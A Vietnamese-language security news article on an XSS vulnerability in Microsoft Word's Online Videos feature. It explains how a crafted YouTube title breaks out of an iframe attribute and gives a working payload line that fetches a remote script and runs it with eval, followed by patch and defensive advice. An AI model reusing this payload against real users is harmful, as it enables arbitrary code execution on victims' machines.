Một lỗ hổng cross-site scripting (XSS) mới và nguy hiểm đã được phát hiện trong Microsoft Office, ảnh hưởng đến hàng trăm triệu người dùng trên toàn thế giới. Lỗ hổng đã được tiết lộ bởi các nhà nghiên cứu an ninh mạng @adm1nkyj và @justlikebono tại PKSecurity, và nó nằm trong tab “Online Videos”, cho phép người dùng chèn video bên ngoài vào tài liệu của họ.

Khi người dùng phát một trong những video bên ngoài được nhúng trong tài liệu, Office sẽ thực hiện thẩm định bằng cách xác minh nguồn của video đó có phải từ một nhà cung cấp đáng tin cậy hay không ( chằng hạn như YouTube). Việc kiểm tra này dựa trên một biểu thức chính quy phù hợp với URL video. Sau khi được thông qua, một yêu cầu sẽ được gửi đến máy chủ để lấy thêm các thông tin chi tiết như tiêu đề và hình thu nhỏ của video.

Phản hồi của máy chủ bao gồm tiêu đề, mô tả của video và thẻ iframe HTML tạo điều kiện phát video. Tuy nhiên, lỗ hổng nằm ở cách máy chủ xử lý tiêu đề video. Nó được thêm vào thuộc tính “title” của thẻ iframe mà không có bất kỳ xác thực nào.

 

Máy chủ phản hồi bằng thông tin bao gồm tiêu đề, mô tả của video và thẻ iframe HTML hỗ trợ phát video. Tuy nhiên, lỗ hổng nằm ở cách máy chủ xử lý tiêu đề video. Nó được thêm vào thuộc tính “title” của thẻ iframe mà không có bất kỳ xác thực nào.

Bằng cách sử dụng dấu ngoặc kép một cách thích hợp, hacker có thể giả mạo thẻ iframe này. Chúng có thể thoải mái thêm thuộc tính onload vào thẻ iframe mà máy chủ phản hồi .

Thao tác như vậy cho phép mã JS được tiêm (từ kẻ tấn công) tìm đường vào tệp HTML mà Word dựa vào, được thực thi thông qua Edge Webview. Chuỗi đặc biệt này lên đến đỉnh điểm với các hoạt động độc hại tiềm ẩn do các thuộc tính sandbox nhất định của iframe.

Với các quyền sandbox, lỗ hổng này không chỉ là một mối đe dọa thầm lặng. Nó cấp quyền để thực thi JavaScript, chạy các URI mong muốn hoặc thậm chí  các tập lệnh từ máy chủ bên ngoài có thể được thực thi.

Chi tiết về lỗ hổng

  1. Tạo video YouTube có tiêu đề bao gồm tải trọng để chèn thuộc tính onload.
" onload="fetch('[http://127.0.0.1/a.js](http://127.0.0.1/a.js)').then(function(a){a.text().then(function(a){eval(a)})})
2. Nhấp vào tab Video trực tuyến trong Word và chèn URL của video độc hại vào tài liệu.
3. Thiết lập một máy chủ web đơn giản cho phép CORS và phản hồi bằng JavaScript độc hại, như bên dưới. (Ví dụ thực thi calc.exe thông qua Lược đồ URI của máy tính.)

Nói cách khác, hacker có thể giả mạo tài liệu Word chứa một video cụ thể. Khi người dùng không nghi ngờ phát video, nó có thể thực thi mã JavaScript tùy ý. Hai lỗ hổng nguy hiểm khác trong Office trước đây, chẳng hạn như CVE-2021-40444 và CVE-2022-30190 (Folina) cũng bắt đầu bằng việc kích hoạt javascript tùy ý.

Thậm chí còn có một khả năng nguy hiểm hơn: việc kết hợp lỗ hổng này với các lỗ hổng khác có thể dẫn đến một cuộc khai thác Thực thi mã từ xa (RCE) nghiêm trọng.

Microsoft đã phát hành một bản vá cho lỗ hổng này, vì vậy điều quan trọng là phải cập nhật phiên bản Office của bạn càng sớm càng tốt. Trong thời gian chờ đợi, có một vài điều bạn có thể làm để tự bảo vệ mình:

  • Không mở tài liệu Word từ những người gửi không xác định.
  • Hãy cẩn thận khi nhấp vào các liên kết trong email, ngay cả khi chúng dường như đến từ một người bạn biết.
  • Nếu bạn cần mở tài liệu Word từ người gửi không xác định, hãy tắt macro trước khi thực hiện. Để thực hiện việc này, hãy mở tài liệu và nhấp vào tab Tệp. Sau đó, nhấp vào Tùy chọn và Trung tâm tin cậy. Trong Cài đặt Trung tâm Tin cậy, bấm vào Cài đặt Macro. Chọn Vô hiệu hóa tất cả macro (được khuyến nghị) và bấm OK

Microsoft cũng đã cung cấp hướng dẫn sau cho người quản trị CNTT:

  • Triển khai các bản cập nhật bảo mật mới nhất cho Microsoft Office.
  • Triển khai giải pháp bảo mật email mạnh mẽ để lọc ra các email độc hại.
  • Giáo dục người dùng về sự nguy hiểm của các cuộc tấn công lừa đảo và cách tự bảo .

Theo Security Online